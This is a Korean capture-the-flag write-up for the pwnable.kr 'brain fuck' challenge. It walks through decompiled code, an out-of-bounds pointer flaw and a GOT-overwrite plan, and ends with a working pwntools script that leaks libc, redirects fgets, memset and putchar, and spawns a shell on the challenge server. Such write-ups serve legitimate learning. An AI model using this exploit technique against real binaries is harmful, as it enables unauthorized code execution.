pwnable.kr brain fuck write-up

소스코드 분석

1
int __cdecl main(int argc, const char **argv, const char **envp)
2
{
3
  size_t i; // [esp+28h] [ebp-40Ch]
4
  char input[1024]; // [esp+2Ch] [ebp-408h] BYREF
5
  unsigned int v6; // [esp+42Ch] [ebp-8h]
6

7
  v6 = __readgsdword(0x14u);
8
  setvbuf(stdout, 0, 2, 0);
9
  setvbuf(stdin, 0, 1, 0);
10
  p = (int)&tape;
11
  puts("welcome to brainfuck testing system!!");
12
  puts("type some brainfuck instructions except [ ]");
13
  memset(input, 0, sizeof(input));
14
  fgets(input, 1024, stdin);
15
  for ( i = 0; i < strlen(input); ++i )
16
    do_brainfuck(input[i]);
17
  return 0;
18
}

1
int __cdecl do_brainfuck(char input)
2
{
3
  int result; // eax
4
  _BYTE *v2; // ebx
5

6
  result = input - 43;
7
  switch ( input )
8
  {
9
    case '+':
10
      result = p;
11
      ++*(_BYTE *)p;
12
      break;
13
    case ',':
14
      v2 = (_BYTE *)p;
15
      result = getchar();
16
      *v2 = result;
17
      break;
18
    case '-':
19
      result = p;
20
      --*(_BYTE *)p;
21
      break;
22
    case '.':
23
      result = putchar(*(char *)p);
24
      break;
25
    case '<':
26
      result = --p;
27
      break;
28
    case '>':
29
      result = ++p;
30
      break;
31
    case '[':
32
      result = puts("[ and ] not supported.");
33
      break;
34
    default:
35
      return result;
36
  }
37
  return result;
38
}

brainfuck 언어에서 [, ] 명령어가 제외된 것을 확인할 수 있다.
바이너리 안에서 포인터 값을 조작하며 쉘을 획득할 수 있을 것 같다.

명령어에 대한 설명은 다음과 같다.

문자	의미
`>`	포인터 증가
`<`	포인터 감소
`+`	포인터가 가리키는 바이트의 값 증가
`-`	포인터가 가리키는 바이트의 값 감소
`.`	포인터가 가리키는 바이트의 값을 ASCII 문자로 출력
`,`	포인터가 가리키는 바이트에 입력받은 문자의 ASCII 값을 넣음
`[`	포인터가 가리키는 바이트의 값이 0이면 짝이 되는 뒤쪽의 `]`로 이동
`]`	포인터가 가리키는 바이트의 값이 0이 아니면 짝이 되는 앞쪽의 `[`로 이동

출처: 위키백과

익스플로잇

1024 바이트만 입력할 수 있기 때문에 포인터 값을 조작할 수 있는 범위내에서 조작해야 한다.

시나리오

system 함수의 실제 주소를 구한다.
fgets -> system got overwrite
memset -> gets got overwrite
putchar -> main got overwrite
putchar를 통해 main 함수를 호출하여 쉘을 획득한다.

getchar 함수로 하위 바이트를 조작하며 overwrite를 진행하였다.

p가 가리키는 값을 p로 변경하면 getchar 함수를 통해 하위 바이트를 쉽게 조작할 수 있다.

1
from pwn import *
2
# context.log_level = 'debug'
3

4
# p = process('./bf')
5
p = remote('pwnable.kr', 9001)
6
e = ELF('./bf')
7
libc = e.libc
8

9
payload = '<' * 0x20
10
payload += ',.>.>.>.'
11
payload += '>' * 0x65
12
payload += ',,>,>,>,'
13
payload += '>' * 0x6d
14
payload += ',,>,>,>,'
15
payload += '>' * 0x51
16
payload += ',,>,>,>,'
17
payload += '.'
18

19
p.sendlineafter(']\n', payload)
20

21
p.send('\x18')
22
puts_addr = u32(p.recvuntil('\xf7'))
23
libc_base = puts_addr - libc.sym['puts']
24
system_addr = libc_base + libc.sym['system']
25
gets_addr = libc_base + libc.sym['gets']
26

27
log.info('puts: ' + hex(puts_addr))
28
log.info('libc_base: ' + hex(libc_base))
29

30
p.send('\x10')
31
p.send(p32(system_addr))
32

33
p.send('\x2c')
34
p.send(p32(gets_addr))
35

36
p.send('\x30')
37
p.send(p32(e.sym['main']))
38

39
p.sendlineafter(']\n', '/bin/sh')
40

41
p.interactive()

쉘을 획득했다.